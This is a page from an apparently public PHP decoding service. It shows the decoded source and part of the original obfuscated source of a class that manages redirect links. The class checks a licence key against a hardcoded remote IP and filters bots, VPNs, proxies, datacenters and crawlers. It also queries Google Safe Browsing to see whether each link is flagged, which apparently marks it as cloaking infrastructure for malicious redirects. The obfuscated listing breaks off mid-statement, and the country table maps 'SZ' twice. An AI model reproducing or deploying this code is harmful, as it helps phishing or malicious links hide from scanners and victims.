Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Important Notice Any unauthorized use of this content may lead to sig..
Decoded Output download
<?php
/* Important Notice
Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
Please respect the rights associated with this work.
*/
session_start();
class User
{
private $edbad = "http://101.99.92.124/api/key";
private $da22e = "http://101.99.92.124/api/get-ip";
private $D447f = "REDIRECT";
public function generateRandomStringChar($ef6e8 = 10)
{
return substr(
str_shuffle(
str_repeat(
$Ec4bd =
"abcdefghijklomnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
ceil($ef6e8 / strlen($Ec4bd))
)
),
1,
$ef6e8
);
}
public function getBaseUrl()
{
goto B32dd;
B1c97:
$Ad24b = $caee4 . $cb284 . "/" . implode("/", $f3c99) . "/";
goto c988c;
B32dd:
$caee4 =
!empty($_SERVER["HTTPS"]) &&
$_SERVER["HTTPS"] !== "off"
? "https://"
: "http://";
goto fcaa7;
df864:
$f3c99 = explode("/", trim($dc992, "/"));
goto Bcbc1;
fcaa7:
$cb284 = $_SERVER["HTTP_HOST"];
goto af197;
Bcbc1:
array_pop($f3c99);
goto B1c97;
c988c:
return $Ad24b;
goto f2dd0;
af197:
$dc992 = $_SERVER["REQUEST_URI"];
goto df864;
f2dd0:
}
public function create_password($Da3db, $F0ce7)
{
goto C0beb;
B6e63:
ab583:
goto e5281;
bd096:
$Dd8bd["status"] = "success";
goto d9ad0;
B409c:
$E94e1 = json_decode($E94e1, true);
goto b363b;
b2296:
cdc75:
goto Fc389;
a658d:
$a322b =
"<?php\xa\xa$config = " .
var_export($config, true) .
";
return $config;\xa";
goto B6de6;
f8aee:
$F0196 = [
"code" => $F0ce7,
"type" => $this->D447f,
];
goto F0e10;
B6de6:
file_put_contents(
"../config.php",
$a322b
);
goto bd096;
bd28b:
if ($this->isStrongPassword($Da3db)) {
goto cdc75;
}
goto Ac5ed;
F9817:
$_SESSION["login"] = true;
goto B6e63;
Dd71f:
$config["key"] = $F0ce7;
goto D217d;
C85ef:
goto a5f60;
goto b2296;
Fc389:
$F0ce7 = $this->escapeString($F0ce7);
goto b384f;
a14f0:
echo json_encode($Dd8bd);
goto a5821;
b384f:
$e4c7c = $this->edbad;
goto f8aee;
Cac85:
$Dd8bd["message"] =
"Key is expired!";
goto Bc9ce;
E17eb:
$config = require "../config.php";
goto Dd71f;
C325f:
$Dd8bd["status"] = "error";
goto Cac85;
C215b:
f78bd:
goto E17eb;
ea404:
$Dd8bd["message"] =
"Minimal password length is 8.";
goto C85ef;
e5281:
d746f:
goto Ee8df;
d9ad0:
$Dd8bd["message"] =
"Login successful!";
goto F9817;
F0e10:
$E94e1 = $this->curl("POST", $e4c7c, $F0196);
goto B409c;
Bc9ce:
goto ab583;
goto C215b;
D217d:
$config["password"] = $Da3db;
goto a658d;
b69d7:
$Dd8bd["status"] = "error";
goto Eb51d;
b9487:
if (!$E94e1["expired"]) {
goto f78bd;
}
goto C325f;
Ac5ed:
$Dd8bd["status"] = "error";
goto ea404;
b363b:
if ($E94e1["live"]) {
goto Dd5f4;
}
goto b69d7;
Eb51d:
$Dd8bd["message"] = $E94e1["error"];
goto Ffa34;
Ffa34:
goto d746f;
goto C7731;
C0beb:
$Da3db = $this->escapeString($Da3db);
goto bd28b;
C7731:
Dd5f4:
goto b9487;
Ee8df:
a5f60:
goto a14f0;
a5821:
}
public function isStrongPassword($Da3db)
{
goto e379a;
Ab2bd:
if (!(strlen($Da3db) < $D8218)) {
goto b2bc4;
}
goto c706b;
e379a:
$D8218 = 8;
goto Ab2bd;
dff75:
b2bc4:
goto Bbca8;
c706b:
return false;
goto dff75;
Bbca8:
return true;
goto Db035;
Db035:
}
public function login($Da3db)
{
goto c5241;
E2696:
echo json_encode($Dd8bd);
goto ac5b9;
b091c:
$Dd8bd["status"] = "error";
goto c3c3b;
F2f2e:
$Dd8bd["status"] = "success";
goto a03ac;
ed45c:
$_SESSION["login"] = true;
goto f082e;
a03ac:
$Dd8bd["message"] =
"Login successful!";
goto ed45c;
c3c3b:
$Dd8bd["message"] =
"Password incorrect";
goto D2c29;
D2c29:
goto fd666;
goto D3825;
fda48:
if ($config["password"] == $Da3db) {
goto Bd688;
}
goto b091c;
c5241:
$Da3db = $this->escapeString($Da3db);
goto b5b9e;
b5b9e:
$config = require "../config.php";
goto fda48;
D3825:
Bd688:
goto F2f2e;
f082e:
fd666:
goto E2696;
ac5b9:
}
public function getFullUrl()
{
goto C5ab6;
C5ab6:
$caee4 =
!empty($_SERVER["HTTPS"]) &&
$_SERVER["HTTPS"] !== "off"
? "https://"
: "http://";
goto b72ae;
B2528:
return $e717d;
goto d05d1;
b72ae:
$e717d =
$caee4 .
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"];
goto B2528;
d05d1:
}
public function generateRandomString($ef6e8 = 10)
{
return substr(
str_shuffle(
str_repeat(
$Ec4bd =
"abcdefghijklomnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
ceil($ef6e8 / strlen($Ec4bd))
)
),
1,
$ef6e8
);
}
public function removeLastTwoDirectories($e4c7c)
{
goto D1f9e;
E9be2:
if (!isset($Cd664["query"])) {
goto C748a;
}
goto D8bf7;
cda3d:
$c736b = explode("/", trim($Cd664["path"], "/"));
goto a2edb;
e2dd0:
$Fcfd2 =
(isset($Cd664["scheme"])
? $Cd664["scheme"] . "://"
: "") .
(isset($Cd664["host"])
? $Cd664["host"]
: "") .
$E8de1;
goto E9be2;
D1f9e:
$Cd664 = parse_url($e4c7c);
goto cda3d;
d063b:
C748a:
goto cc4a1;
cc4a1:
return $Fcfd2;
goto cd26e;
D8bf7:
$Fcfd2 .= "?" . $Cd664["query"];
goto d063b;
B4c6d:
$E8de1 = "/" . implode("/", $b469f);
goto e2dd0;
a2edb:
$b469f = array_slice($c736b, 0, -2);
goto B4c6d;
cd26e:
}
public function logout()
{
goto E6786;
E6786:
if (!isset($_SESSION["login"])) {
goto c3cb3;
}
goto ff53f;
ba3df:
c3cb3:
goto f0d92;
ff53f:
session_destroy();
goto ba3df;
f0d92:
}
public function check()
{
goto D213c;
e34b5:
b1b53:
goto Ca3a2;
Aa460:
die();
goto e34b5;
Aefde:
header("Location: login");
goto Aa460;
D213c:
if (isset($_SESSION["login"])) {
goto b1b53;
}
goto Aefde;
Ca3a2:
}
public function curl($D0c42, $e4c7c, $F0196 = "")
{
goto a2532;
D13fd:
curl_setopt($cabdd, CURLOPT_RETURNTRANSFER, true);
goto Ada2e;
Aa492:
curl_setopt($cabdd, CURLOPT_URL, $e4c7c);
goto a5d43;
Ada2e:
$E94e1 = curl_exec($cabdd);
goto B2d82;
A26f4:
A5171:
goto ddd82;
B2d82:
if (!($E94e1 === false)) {
goto A5171;
}
goto Ce4bc;
ddd82:
curl_close($cabdd);
goto B30a7;
dbbb2:
eb62d:
goto D13fd;
Fc780:
curl_setopt($cabdd, CURLOPT_POSTFIELDS, http_build_query($F0196));
goto dbbb2;
a5d43:
if (!($D0c42 == "POST")) {
goto eb62d;
}
goto D717a;
D717a:
curl_setopt($cabdd, CURLOPT_POST, true);
goto Fc780;
B30a7:
return $E94e1;
goto Db47e;
Ce4bc:
echo "cURL error: " .
curl_error($cabdd);
goto A26f4;
a2532:
$cabdd = curl_init();
goto Aa492;
Db47e:
}
public function getServerIp()
{
goto D5ce4;
E731a:
return $E94e1["ip"];
goto ef121;
C8286:
$E94e1 = json_decode($E94e1, true);
goto E731a;
D5ce4:
$e4c7c = $this->da22e;
goto C606e;
C606e:
$E94e1 = $this->curl("GET", $e4c7c, "");
goto C8286;
ef121:
}
private function escapeString($d8a8a)
{
goto d279a;
b2af9:
return $d8a8a;
goto Ad4b5;
Ecb16:
$d8a8a = str_replace("<", "", $d8a8a);
goto aeeb4;
aeeb4:
$d8a8a = str_replace("'", "", $d8a8a);
goto b2af9;
d279a:
$d8a8a = htmlspecialchars(
strip_tags($d8a8a),
ENT_QUOTES,
"UTF-8"
);
goto Ecb16;
Ad4b5:
}
public function readJsonVisitFile($config, $af19a)
{
goto a8807;
d6433:
$Ea8c8 =
$E4e50 .
"/../" .
$config["files"]["visit"];
goto Cf7bb;
c4598:
C4f52:
goto d969a;
dc9a5:
$bedb2["data"] = [];
goto bc540;
Cff79:
$bedb2["draw"] = 1;
goto f804e;
c40ed:
$f1283 = file_get_contents($Ea8c8);
goto b239b;
a8807:
$E4e50 = dirname(__FILE__);
goto b0c3c;
Bdefe:
$bedb2[
"recordsFiltered"
] = 0;
goto e558f;
d9223:
return is_array($bedb2) ? $bedb2 : [];
goto Cb3b4;
f804e:
$bedb2["recordsTotal"] = 0;
goto Bdefe;
bdfc4:
ae888:
goto c40ed;
b239b:
$F0196 = json_decode($f1283, true);
goto Cff79;
Cf7bb:
adfe9:
goto eb08e;
A6990:
foreach ($F0196 as $A72ac) {
goto b5c4f;
F689e:
$bedb2["botCount"]++;
goto d6944;
b5c4f:
$A72ac = $this->checkUserSecurity($config, $A72ac);
goto Fc247;
Fc247:
if (!$A72ac["info"]["is_bot"]) {
goto Bfc1f;
}
goto F689e;
d6944:
Bfc1f:
goto f4ce7;
f4ce7:
$b36a6 = array_merge($A72ac, $A72ac["info"]);
goto Cc1f1;
E0a45:
$bedb2["recordsTotal"]++;
goto Adea4;
Cc1f1:
unset($b36a6["info"]);
goto bbb17;
bbb17:
$bedb2["data"][
$bedb2["recordsTotal"]
] = $b36a6;
goto E0a45;
Adea4:
f1879:
goto C4ea1;
C4ea1:
}
goto c4598;
bc540:
if (!is_array($F0196)) {
goto C86d4;
}
goto A6990;
eb08e:
if (file_exists($Ea8c8)) {
goto ae888;
}
goto Da60b;
Da60b:
file_put_contents($Ea8c8, json_encode([]));
goto d0128;
e558f:
$bedb2["botCount"] = 0;
goto dc9a5;
d0128:
return [];
goto bdfc4;
d969a:
C86d4:
goto d9223;
b0c3c:
if (!($af19a == "visit")) {
goto adfe9;
}
goto d6433;
Cb3b4:
}
public function checkUserSecurity($config, $bedb2)
{
goto F3dd2;
B461a:
be221:
goto F867d;
dab3f:
if (
$bedb2["info"][
"is_datacenter"
] != false &&
$config["bot"][
"datacenter"
] == 2
) {
goto E906d;
}
goto efdab;
e6fad:
if (
!(
$config["bot"]["proxy"] == 1 &&
$bedb2["info"]["is_proxy"]
)
) {
goto e0b39;
}
goto e0f8c;
Cbd52:
e0499:
goto E7f8c;
D5876:
e0b39:
goto ca76e;
E2d51:
$bedb2["info"]["is_bot"] = true;
goto d02b1;
efdab:
if (
!(
$bedb2["info"][
"is_datacenter"
] != false &&
$config["bot"][
"datacenter"
] == 1 &&
$bedb2["info"][
"is_blocked_datacenter"
] == true
)
) {
goto D3a36;
}
goto Ec711;
F867d:
F3df0:
goto fd207;
B30cf:
if (
!(
$config["bot"]["crawler"] == 1 &&
$bedb2["info"][
"is_crawler"
]
)
) {
goto E4982;
}
goto D7f0c;
D7f0c:
$bedb2["info"]["is_bot"] = true;
goto E73cf;
B3783:
if (
!(
$config["bot"][
"datacenter"
] != 0
)
) {
goto F3df0;
}
goto dab3f;
d02b1:
C7a42:
goto Cbd52;
fd207:
if (
!(
$config["bot"]["vpn"] == 1 &&
$bedb2["info"]["is_vpn"]
)
) {
goto c0cb4;
}
goto Ffed9;
Ec711:
$bedb2["info"]["is_bot"] = true;
goto d3f7f;
Ebbdc:
goto be221;
goto e898d;
Ffed9:
$bedb2["info"]["is_bot"] = true;
goto A4f50;
ee939:
if (!$bedb2["info"]["status"]) {
goto e0499;
}
goto B30cf;
E7f8c:
return $bedb2;
goto fd61b;
E73cf:
E4982:
goto B3783;
d3f7f:
D3a36:
goto Ebbdc;
D7a51:
$bedb2["info"]["is_bot"] = true;
goto B461a;
e0f8c:
$bedb2["info"]["is_bot"] = true;
goto D5876;
e898d:
E906d:
goto D7a51;
A4f50:
c0cb4:
goto e6fad;
F3dd2:
$bedb2["info"]["is_bot"] = false;
goto ee939;
ca76e:
if (
!(
$config["bot"]["abuser"] == 1 &&
$bedb2["info"][
"is_abuser"
]
)
) {
goto C7a42;
}
goto E2d51;
fd61b:
}
public function readJsonFile($Ea8c8)
{
goto ff15a;
cca58:
$f1283 = file_get_contents($Ea8c8);
goto d5249;
bafc9:
return is_array($F0196) ? $F0196 : [];
goto cb17f;
d5249:
$F0196 = json_decode($f1283, true);
goto bafc9;
Ef514:
A8532:
goto cca58;
B31dd:
return [];
goto Ef514;
B1b4c:
file_put_contents($Ea8c8, json_encode([]));
goto B31dd;
ff15a:
if (file_exists($Ea8c8)) {
goto A8532;
}
goto B1b4c;
cb17f:
}
public function writeJsonFile($Ea8c8, $F0196)
{
$f1283 = json_encode($F0196, JSON_PRETTY_PRINT);
file_put_contents($Ea8c8, $f1283);
}
public function getFirstDataByIp($F0196, $cd5aa)
{
goto e7883;
e7883:
foreach ($F0196 as $Ac81f) {
goto c3810;
C6154:
B6190:
goto d6926;
B1288:
df6a9:
goto C6154;
d116d:
return $Ac81f;
goto B1288;
c3810:
if (!(isset($Ac81f["ip"]) && $Ac81f["ip"] === $cd5aa)) {
goto df6a9;
}
goto d116d;
d6926:
}
goto Cbd87;
Cbd87:
E9767:
goto be09e;
be09e:
return null;
goto afb81;
afb81:
}
public function generatePrimaryId($F0196)
{
goto b13b7;
E020c:
foreach ($F0196 as $Ac81f) {
goto b5ad2;
D3f09:
Ee51c:
goto d4f28;
d4f28:
Fcd4f:
goto ca74d;
b5ad2:
if (!(isset($Ac81f["id"]) && $Ac81f["id"] > $Ea3d9)) {
goto Ee51c;
}
goto Ac56d;
Ac56d:
$Ea3d9 = $Ac81f["id"];
goto D3f09;
ca74d:
}
goto A917b;
A917b:
d6f2a:
goto C693d;
b13b7:
$Ea3d9 = 0;
goto E020c;
C693d:
return $Ea3d9 + 1;
goto Dbddd;
Dbddd:
}
public function isDataExist($F0196, $F6ca6)
{
goto bfd29;
Efc6d:
return false;
goto f1547;
bfd29:
foreach ($F0196 as $Ac81f) {
goto D7ae6;
bb304:
e2ccb:
goto Bafae;
Bafae:
acbc5:
goto f6ce7;
F00be:
return true;
goto bb304;
D7ae6:
if (
!(
isset($Ac81f["link"]) &&
$Ac81f["link"] === $F6ca6
)
) {
goto e2ccb;
}
goto F00be;
f6ce7:
}
goto bf151;
bf151:
C8add:
goto Efc6d;
f1547:
}
public function edit_link($f219b, $F6ca6, $E7d19)
{
goto b8d64;
Fd09c:
$bedb2["status"] = false;
goto B5f3f;
B5f3f:
$bedb2["reason"] =
"Link not found";
goto Aa304;
a5402:
$Ea8c8 =
$E4e50 .
"/../log/link.json";
goto D82ac;
f14ca:
$bedb2["status"] = true;
goto df8f9;
a0933:
$F0196[$F220c]["link"] = $F6ca6;
goto E1c36;
f1271:
return;
goto deaab;
df8f9:
$E4e50 = dirname(__FILE__);
goto a5402;
Aa304:
echo json_encode($bedb2);
goto f1271;
D681f:
echo json_encode($bedb2);
goto F3a6a;
edd95:
$F220c = array_search($f219b, array_column($F0196, "id"));
goto c1512;
E1c20:
$this->writeJsonFile($Ea8c8, $F0196);
goto D681f;
F3a6a:
exit();
goto ca5c6;
D82ac:
$F0196 = $this->readJsonFile($Ea8c8);
goto edd95;
deaab:
D2c81:
goto a0933;
b8d64:
header(
"Content-Type: application/json"
);
goto f14ca;
E1c36:
$F0196[$F220c]["format"] = $E7d19;
goto E1c20;
c1512:
if (!($F220c === false)) {
goto D2c81;
}
goto Fd09c;
ca5c6:
}
public function add_link($F6ca6, $E7d19)
{
goto Ef35e;
f401b:
$e413b["link"] = $F6ca6;
goto C2fad;
Ba216:
echo json_encode($bedb2);
goto b715b;
b3550:
$bedb2["id"] = $e413b["id"];
goto ade2a;
B4c41:
$F0196 = $this->readJsonFile($Ea8c8);
goto e883f;
C88e1:
exit();
goto Fe431;
d278e:
$bedb2["reason"] =
"Link already exists";
goto Ba216;
b715b:
return;
goto bf345;
Bea98:
$Ea8c8 =
$E4e50 .
"/../log/link.json";
goto B4c41;
dd0c5:
$F0196[] = $e413b;
goto b3550;
Fbca2:
$e413b["id"] = $this->generatePrimaryId($F0196);
goto f401b;
bf345:
a302d:
goto Fbca2;
f8015:
$bedb2["status"] = false;
goto d278e;
Ef35e:
header(
"Content-Type: application/json"
);
goto d2d76;
C2fad:
$e413b["format"] = $E7d19;
goto dd0c5;
A7fd7:
$E4e50 = dirname(__FILE__);
goto Bea98;
d2d76:
$bedb2["status"] = true;
goto A7fd7;
ade2a:
$this->writeJsonFile($Ea8c8, $F0196);
goto c7cde;
e883f:
if (!$this->isDataExist($F0196, $F6ca6)) {
goto a302d;
}
goto f8015;
c7cde:
echo json_encode($bedb2);
goto C88e1;
Fe431:
}
public function delete_link($f219b)
{
goto f4e11;
f053d:
echo json_encode($bedb2);
goto F22b4;
ea767:
$bedb2["reason"] =
"Link does not exist";
goto f053d;
Feba6:
if ($d8aad) {
goto b793e;
}
goto C71bd;
e4394:
$Ea8c8 =
$E4e50 .
"/../log/link.json";
goto E5b45;
D84c2:
$F0196 = array_values($F0196);
goto a34b3;
a34b3:
$this->writeJsonFile($Ea8c8, $F0196);
goto dca3e;
Fe8e8:
Fa4b6:
goto Feba6;
a1346:
b793e:
goto D84c2;
a97b1:
die();
goto c4f52;
bc0e2:
$bedb2["status"] = true;
goto Ccc53;
F22b4:
die();
goto a1346;
C8053:
foreach ($F0196 as $F0ce7 => $Ac81f) {
goto F7f27;
F7f27:
if (!($Ac81f["id"] == $f219b)) {
goto C3087;
}
goto e097a;
A86f4:
goto Fa4b6;
goto Aa7c4;
f3042:
f694c:
goto e224b;
Aa7c4:
C3087:
goto f3042;
F5546:
unset($F0196[$F0ce7]);
goto A86f4;
e097a:
$d8aad = true;
goto F5546;
e224b:
}
goto Fe8e8;
Ccc53:
$E4e50 = dirname(__FILE__);
goto e4394;
f4e11:
header(
"Content-Type: application/json"
);
goto bc0e2;
E5b45:
$F0196 = $this->readJsonFile($Ea8c8);
goto a8726;
a8726:
$d8aad = false;
goto C8053;
C71bd:
$bedb2["status"] = false;
goto ea767;
dca3e:
echo json_encode($bedb2);
goto a97b1;
c4f52:
}
public function getLink($Cc75e)
{
goto E43b9;
Eb4d4:
return $Edaf0;
goto b983d;
F2279:
Ebc14:
goto edbd2;
cb468:
foreach ($F98fd as $acba1) {
goto df8d6;
df8d6:
if (!isset($acba1["link"])) {
goto ee9b1;
}
goto c7782;
d4e74:
ee9b1:
goto b5c69;
b5c69:
f4f4b:
goto Eda85;
c7782:
$Edaf0[] = $acba1["link"];
goto d4e74;
Eda85:
}
goto Cfb6b;
a1c3b:
die(
"Error reading the JSON file."
);
goto B35be;
b9f57:
c8629:
goto F19fa;
edbd2:
$Edaf0 = [];
goto cb468;
B56d8:
return [];
goto b9f57;
Ab79a:
if (!($c466a === false)) {
goto Da594;
}
goto a1c3b;
B35be:
Da594:
goto Cd989;
Cd989:
if (!(trim($c466a) === "")) {
goto c8629;
}
goto B56d8;
B73ab:
if (!(json_last_error() !== JSON_ERROR_NONE)) {
goto C25cd;
}
goto Cfb55;
Ed13e:
C25cd:
goto Fc26d;
Fc26d:
if (is_array($F98fd)) {
goto Ebc14;
}
goto ec654;
Cfb55:
die(
"Error decoding JSON: " .
json_last_error_msg()
);
goto Ed13e;
b2db4:
$c466a = file_get_contents($D2229);
goto Ab79a;
F19fa:
$F98fd = json_decode($c466a, true);
goto B73ab;
ec654:
die(
"Error: The decoded JSON is not an array."
);
goto F2279;
E43b9:
$D2229 = $Cc75e;
goto b2db4;
Cfb6b:
b7b90:
goto Eb4d4;
b983d:
}
public function redflag_check($e4c7c)
{
goto a3a84;
Bb09a:
return strpos($E94e1, "[["sb.ssr",1") ===
false;
goto D8f76;
a3a84:
$e4c7c =
"https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site=" .
$e4c7c;
goto e9f42;
e9f42:
$E94e1 = $this->curl("GET", $e4c7c);
goto Bb09a;
D8f76:
}
function isSiteActive($e4c7c)
{
goto Ccdf9;
d257d:
curl_setopt($cabdd, CURLOPT_RETURNTRANSFER, true);
goto f22dd;
A6e87:
curl_setopt($cabdd, CURLOPT_NOBODY, true);
goto d257d;
F382b:
$ad294 = curl_getinfo($cabdd, CURLINFO_HTTP_CODE);
goto Ae53b;
Ccdf9:
$cabdd = curl_init($e4c7c);
goto A6e87;
Ddee3:
curl_setopt($cabdd, CURLOPT_FOLLOWLOCATION, true);
goto deddd;
f22dd:
curl_setopt($cabdd, CURLOPT_TIMEOUT, 10);
goto Ddee3;
Ae53b:
curl_close($cabdd);
goto A4d84;
deddd:
curl_exec($cabdd);
goto F382b;
A4d84:
return $ad294 >= 200 && $ad294 < 400;
goto d7323;
d7323:
}
public function getCountry()
{
$d55f1 = [
"AF" => "Afghanistan",
"AL" => "Albania",
"DZ" => "Algeria",
"AD" => "Andorra",
"AO" => "Angola",
"AG" =>
"Antigua and Barbuda",
"AR" => "Argentina",
"AM" => "Armenia",
"AU" => "Australia",
"AT" => "Austria",
"AZ" => "Azerbaijan",
"BS" => "Bahamas",
"BH" => "Bahrain",
"BD" => "Bangladesh",
"BB" => "Barbados",
"BY" => "Belarus",
"BE" => "Belgium",
"BZ" => "Belize",
"BJ" => "Benin",
"BT" => "Bhutan",
"BO" => "Bolivia",
"BA" =>
"Bosnia and Herzegovina",
"BW" => "Botswana",
"BR" => "Brazil",
"BN" => "Brunei",
"BG" => "Bulgaria",
"BF" => "Burkina Faso",
"BI" => "Burundi",
"CV" => "Cabo Verde",
"KH" => "Cambodia",
"CM" => "Cameroon",
"CA" => "Canada",
"CF" =>
"Central African Republic",
"TD" => "Chad",
"CL" => "Chile",
"CN" => "China",
"CO" => "Colombia",
"KM" => "Comoros",
"CD" =>
"Congo, Democratic Republic of the",
"CG" =>
"Congo, Republic of the",
"CR" => "Costa Rica",
"HR" => "Croatia",
"CU" => "Cuba",
"CY" => "Cyprus",
"CZ" =>
"Czech Republic",
"DK" => "Denmark",
"DJ" => "Djibouti",
"DM" => "Dominica",
"DO" =>
"Dominican Republic",
"EC" => "Ecuador",
"EG" => "Egypt",
"SV" => "El Salvador",
"GQ" =>
"Equatorial Guinea",
"ER" => "Eritrea",
"EE" => "Estonia",
"SZ" => "Eswatini",
"ET" => "Ethiopia",
"FJ" => "Fiji",
"FI" => "Finland",
"FR" => "France",
"GA" => "Gabon",
"GM" => "Gambia",
"GE" => "Georgia",
"DE" => "Germany",
"GH" => "Ghana",
"GR" => "Greece",
"GD" => "Grenada",
"GT" => "Guatemala",
"GN" => "Guinea",
"GW" => "Guinea-Bissau",
"GY" => "Guyana",
"HT" => "Haiti",
"HN" => "Honduras",
"HU" => "Hungary",
"IS" => "Iceland",
"IN" => "India",
"ID" => "Indonesia",
"IR" => "Iran",
"IQ" => "Iraq",
"IE" => "Ireland",
"IL" => "Israel",
"IT" => "Italy",
"JM" => "Jamaica",
"JP" => "Japan",
"JE" => "Jersey",
"JO" => "Jordan",
"KZ" => "Kazakhstan",
"KE" => "Kenya",
"KI" => "Kiribati",
"KP" => "Korea, North",
"KR" => "Korea, South",
"KW" => "Kuwait",
"KG" => "Kyrgyzstan",
"LA" => "Laos",
"LV" => "Latvia",
"LB" => "Lebanon",
"LS" => "Lesotho",
"LR" => "Liberia",
"LY" => "Libya",
"LI" =>
"Liechtenstein",
"LT" => "Lithuania",
"LU" => "Luxembourg",
"MG" => "Madagascar",
"MW" => "Malawi",
"MY" => "Malaysia",
"MV" => "Maldives",
"ML" => "Mali",
"MT" => "Malta",
"MH" =>
"Marshall Islands",
"MR" => "Mauritania",
"MU" => "Mauritius",
"MX" => "Mexico",
"FM" => "Micronesia",
"MD" => "Moldova",
"MC" => "Monaco",
"MN" => "Mongolia",
"ME" => "Montenegro",
"MA" => "Morocco",
"MZ" => "Mozambique",
"MM" => "Myanmar",
"NA" => "Namibia",
"NR" => "Nauru",
"NP" => "Nepal",
"NL" => "Netherlands",
"NZ" => "New Zealand",
"NI" => "Nicaragua",
"NE" => "Niger",
"NG" => "Nigeria",
"MK" =>
"North Macedonia",
"NO" => "Norway",
"OM" => "Oman",
"PK" => "Pakistan",
"PW" => "Palau",
"PS" => "Palestine",
"PA" => "Panama",
"PG" =>
"Papua New Guinea",
"PY" => "Paraguay",
"PE" => "Peru",
"PH" => "Philippines",
"PL" => "Poland",
"PT" => "Portugal",
"QA" => "Qatar",
"RE" => "R\303\xa9union",
"RO" => "Romania",
"RU" => "Russia",
"RW" => "Rwanda",
"WS" => "Samoa",
"SM" => "San Marino",
"ST" =>
"Sao Tome and Principe",
"SA" => "Saudi Arabia",
"SN" => "Senegal",
"RS" => "Serbia",
"SC" => "Seychelles",
"SL" => "Sierra Leone",
"SG" => "Singapore",
"SK" => "Slovakia",
"SI" => "Slovenia",
"SB" =>
"Solomon Islands",
"SO" => "Somalia",
"ZA" => "South Africa",
"SS" => "South Sudan",
"ES" => "Spain",
"LK" => "Sri Lanka",
"SD" => "Sudan",
"SR" => "Suriname",
"SZ" => "Sweden",
"CH" => "Switzerland",
"SY" => "Syria",
"TW" => "Taiwan",
"TJ" => "Tajikistan",
"TZ" => "Tanzania",
"TH" => "Thailand",
"TL" => "Timor-Leste",
"TG" => "Togo",
"TO" => "Tonga",
"TT" =>
"Trinidad and Tobago",
"TN" => "Tunisia",
"TR" => "Turkey",
"TM" => "Turkmenistan",
"TV" => "Tuvalu",
"UG" => "Uganda",
"UA" => "Ukraine",
"AE" =>
"United Arab Emirates",
"GB" =>
"United Kingdom",
"US" => "United States",
"UY" => "Uruguay",
"UZ" => "Uzbekistan",
"VU" => "Vanuatu",
"VE" => "Venezuela",
"VN" => "Vietnam",
"YE" => "Yemen",
"ZM" => "Zambia",
"ZW" => "Zimbabwe",
];
return $d55f1;
}
}
?>
Did this file decode correctly?
Original Code
<?php
/* Important Notice
Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
Please respect the rights associated with this work.
*/
session_start();
class User
{
private $edbad = "\150\x74\164\160\72\x2f\57\61\60\x31\56\x39\x39\x2e\x39\62\x2e\x31\62\64\x2f\x61\x70\x69\57\153\145\171";
private $da22e = "\x68\164\x74\160\72\57\57\61\x30\x31\56\71\x39\56\x39\62\x2e\x31\x32\x34\x2f\x61\160\151\57\147\x65\164\x2d\x69\x70";
private $D447f = "\x52\105\x44\x49\122\x45\x43\124";
public function generateRandomStringChar($ef6e8 = 10)
{
return substr(
str_shuffle(
str_repeat(
$Ec4bd =
"\141\142\x63\144\x65\x66\x67\150\151\x6a\153\154\x6f\x6d\156\157\x70\x71\162\x73\164\x75\166\167\170\171\x7a\x41\x42\103\104\x45\106\107\110\111\112\x4b\114\x4d\x4e\117\x50\121\122\x53\x54\x55\126\127\130\x59\132",
ceil($ef6e8 / strlen($Ec4bd))
)
),
1,
$ef6e8
);
}
public function getBaseUrl()
{
goto B32dd;
B1c97:
$Ad24b = $caee4 . $cb284 . "\x2f" . implode("\57", $f3c99) . "\57";
goto c988c;
B32dd:
$caee4 =
!empty($_SERVER["\110\124\124\x50\x53"]) &&
$_SERVER["\x48\x54\124\120\123"] !== "\157\146\146"
? "\x68\164\x74\x70\163\72\x2f\57"
: "\150\164\164\160\x3a\x2f\57";
goto fcaa7;
df864:
$f3c99 = explode("\x2f", trim($dc992, "\57"));
goto Bcbc1;
fcaa7:
$cb284 = $_SERVER["\110\124\x54\120\x5f\x48\x4f\123\124"];
goto af197;
Bcbc1:
array_pop($f3c99);
goto B1c97;
c988c:
return $Ad24b;
goto f2dd0;
af197:
$dc992 = $_SERVER["\x52\105\121\x55\105\123\124\137\125\122\x49"];
goto df864;
f2dd0:
}
public function create_password($Da3db, $F0ce7)
{
goto C0beb;
B6e63:
ab583:
goto e5281;
bd096:
$Dd8bd["\x73\x74\x61\x74\165\x73"] = "\x73\165\x63\143\x65\163\x73";
goto d9ad0;
B409c:
$E94e1 = json_decode($E94e1, true);
goto b363b;
b2296:
cdc75:
goto Fc389;
a658d:
$a322b =
"\74\77\160\x68\x70\xa\xa\x24\143\157\x6e\x66\151\x67\40\75\x20" .
var_export($config, true) .
"\73\12\x72\145\164\165\162\156\x20\x24\143\157\x6e\x66\x69\x67\73\xa";
goto B6de6;
f8aee:
$F0196 = [
"\x63\157\x64\145" => $F0ce7,
"\164\x79\160\x65" => $this->D447f,
];
goto F0e10;
B6de6:
file_put_contents(
"\x2e\x2e\57\143\157\156\146\151\147\x2e\160\x68\x70",
$a322b
);
goto bd096;
bd28b:
if ($this->isStrongPassword($Da3db)) {
goto cdc75;
}
goto Ac5ed;
F9817:
$_SESSION["\154\157\147\151\156"] = true;
goto B6e63;
Dd71f:
$config["\x6b\x65\x79"] = $F0ce7;
goto D217d;
C85ef:
goto a5f60;
goto b2296;
Fc389:
$F0ce7 = $this->escapeString($F0ce7);
goto b384f;
a14f0:
echo json_encode($Dd8bd);
goto a5821;
b384f:
$e4c7c = $this->edbad;
goto f8aee;
Cac85:
$Dd8bd["\x6d\x65\163\163\141\147\145"] =
"\113\x65\171\x20\x69\x73\x20\x65\170\x70\x69\x72\x65\x64\x21";
goto Bc9ce;
E17eb:
$config = require "\56\x2e\57\x63\x6f\156\x66\x69\x67\x2e\x70\150\160";
goto Dd71f;
C325f:
$Dd8bd["\163\x74\x61\x74\x75\x73"] = "\145\162\162\x6f\162";
goto Cac85;
C215b:
f78bd:
goto E17eb;
ea404:
$Dd8bd["\155\145\x73\x73\141\x67\x65"] =
